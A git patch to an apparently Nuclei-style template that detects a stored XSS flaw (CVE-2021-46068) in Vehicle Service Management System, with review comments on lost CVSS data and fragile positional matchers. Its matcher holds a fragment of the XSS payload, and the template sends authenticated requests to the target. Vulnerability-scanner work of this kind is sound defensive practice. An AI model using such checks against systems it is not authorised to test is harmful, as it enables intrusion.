From f199b830e2b8ddfb0df9509c8b4046a60ae594bc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Sep 2022 12:56:16 +0530 Subject: [PATCH] Update CVE-2021-46068.yaml --- cves/2021/CVE-2021-46068.yaml | 35 ++++++++++++++++------------------- 1 file changed, 16 insertions(+), 19 deletions(-) diff --git a/cves/2021/CVE-2021-46068.yaml b/cves/2021/CVE-2021-46068.yaml index d5a626c175..801043edbf 100644 --- a/cves/2021/CVE-2021-46068.yaml +++ b/cves/2021/CVE-2021-46068.yaml @@ -1,25 +1,21 @@ id: CVE-2021-46068 + info: - name: Vehicle Service Management System - "My Account" Stored Cross Site Scripting (XSS) + name: Vehicle Service Management System - Stored Cross Site Scripting author: TenBird - severity: Medium - description: A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel. + severity: medium + description: | + A Stored Cross Site Scripting (XSS) vulnerability exists in Vehicle Service Management System 1.0 via the My Account Section in login panel. reference: + - https://github.com/plsanu/Vehicle-Service-Management-System-MyAccount-Stored-Cross-Site-Scripting-XSS + - https://www.plsanu.com/vehicle-service-management-system-myaccount-stored-cross-site-scripting-xss - https://nvd.nist.gov/vuln/detail/CVE-2021-46068 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 cve-id: CVE-2021-46068 - cwe-id: CWE-79 - tags: cve,cve2021,Stored XSS,Cross-Site-Script + tags: cve,cve2021,xss,vms,authenticated requests: - raw: - - - | - GET /vehicle_service/admin/login.php HTTP/1.1 - Host: {{Hostname}} - - | POST /vehicle_service/classes/Login.php?f=login HTTP/1.1 Host: {{Hostname}} 
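Review bot: The `classification` block loses `cvss-metrics`, `cvss-score` and `cwe-id` in this hunk and keeps only `cve-id`, so anyone filtering or prioritising findings by score or CWE gets nothing from this template even though `severity: medium` is still asserted. Unless those values were found to be wrong, keep them: `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N`, `cvss-score: 4.8`, `cwe-id: CWE-79`. The new `authenticated` tag is a good addition. Because this is a stored XSS check, the request that writes the value (outside this hunk) presumably changes state on the scanned host; if so, add `intrusive` to `tags` so operators can exclude the template from production scans.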
@@ -38,14 +34,15 @@ requests: GET /vehicle_service/admin/?page=user HTTP/1.1 Host: {{Hostname}} + req-condition: true redirects: true + max-redirects: 2 cookie-reuse: true matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word - part: body - words: - - '">' \ No newline at end of file + - type: dsl + dsl: + - "contains(all_headers_3, 'text/html')" + - "status_code_3 == 200" + - 'contains(body_3, "Adminstrator\"> Admin")' + condition: and
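Review bot: The new DSL matcher selects the response by position (`all_headers_3`, `status_code_3`, `body_3`), while the first hunk of this patch appears to drop the initial `GET /vehicle_service/admin/login.php` request, so `_3` only refers to `GET /vehicle_service/admin/?page=user` if exactly three raw requests remain. The request between the login and this GET is outside both hunks, so that count should be confirmed. A comment above the matcher would stop this breaking silently on the next edit, for example `# *_3 = response to the final GET ?page=user; requires req-condition: true`. As shown on this page, the body check is `contains(body_3, "Adminstrator\"> Admin")`. A second comment should state that this string must equal the value the earlier request stores, reflected unescaped, so that an HTML-encoded echo of the same value does not count as a finding.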